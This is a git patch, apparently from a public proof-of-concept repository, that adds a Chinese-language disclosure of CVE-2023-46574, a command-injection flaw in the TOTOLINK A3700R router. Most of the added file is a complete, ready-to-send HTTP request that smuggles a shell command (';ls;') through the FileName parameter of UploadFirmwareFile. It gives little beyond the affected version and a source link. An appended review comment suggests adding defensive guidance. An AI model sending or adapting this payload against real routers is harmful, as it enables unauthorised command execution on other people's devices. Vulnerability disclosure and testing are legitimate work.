From 39900f8b3789b5400cc3b8cc1c98cbc230c2a4f8 Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Sun, 26 Nov 2023 11:50:37 +0800 Subject: [PATCH] =?UTF-8?q?Create=20TOTOLINK=20A3700R=E5=91=BD=E4=BB=A4?= =?UTF-8?q?=E6=89=A7=E8=A1=8C=E6=BC=8F=E6=B4=9ECVE-2023-46574.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md | 33 ++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md diff --git a/TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md b/TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md new file mode 100644 index 0000000..47e90eb --- /dev/null +++ b/TOTOLINK A3700R命令执行漏洞CVE-2023-46574.md @@ -0,0 +1,33 @@ + +## TOTOLINK A3700R命令执行漏洞CVE-2023-46574 +TOTOLINK A3700R v9.1.2u.6165_20211012版本存在命令执行漏洞,攻击者可利用该漏洞通过UploadFirmwareFile函数的FileName参数执行任意代码。 + +## 影响版本: +``` +TOTOLINK A3700R v9.1.2u.6165_20211012 +``` + + +## poc +``` +POST /cgi-bin/cstecgi.cgi HTTP/1.1 +Host: 192.168.122.15 +Content-Length: 73 +Accept: application/json, text/javascript, */*; q=0.01 +X-Requested-With: XMLHttpRequest +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +Origin: http://192.168.122.15 +Referer: http://192.168.122.15/basic/index.html?time=1697964093345 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: SESSION_ID=2:1697964047:2 +Connection: close + + +{"topicurl":"UploadFirmwareFile","FileName":";ls;"} +``` +![image](https://github.com/wy876/POC/assets/139549762/37a0b1f8-101e-4642-b9fa-3fda6f31f079) + +## 来源 +- https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md
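Review bot: The added file stops at `## 来源` with no remediation or detection guidance, and the request under `## poc` carries `Cookie: SESSION_ID=2:1697964047:2` without the text saying whether an authenticated session is a precondition. Suggest adding a short section after `## 影响版本` that states the authentication requirement and what a defender should do, for example restricting access to the management interface that serves `/cgi-bin/cstecgi.cgi` and alerting on shell metacharacters such as `;` in the `FileName` field of `UploadFirmwareFile` requests. The description also says the flaw allows executing arbitrary code (任意代码) while the heading calls it command execution (命令执行); pick one term and use it in both places. Finally, the two code fences have no language tag, and the affected-version line would read better as plain text than as a fenced block.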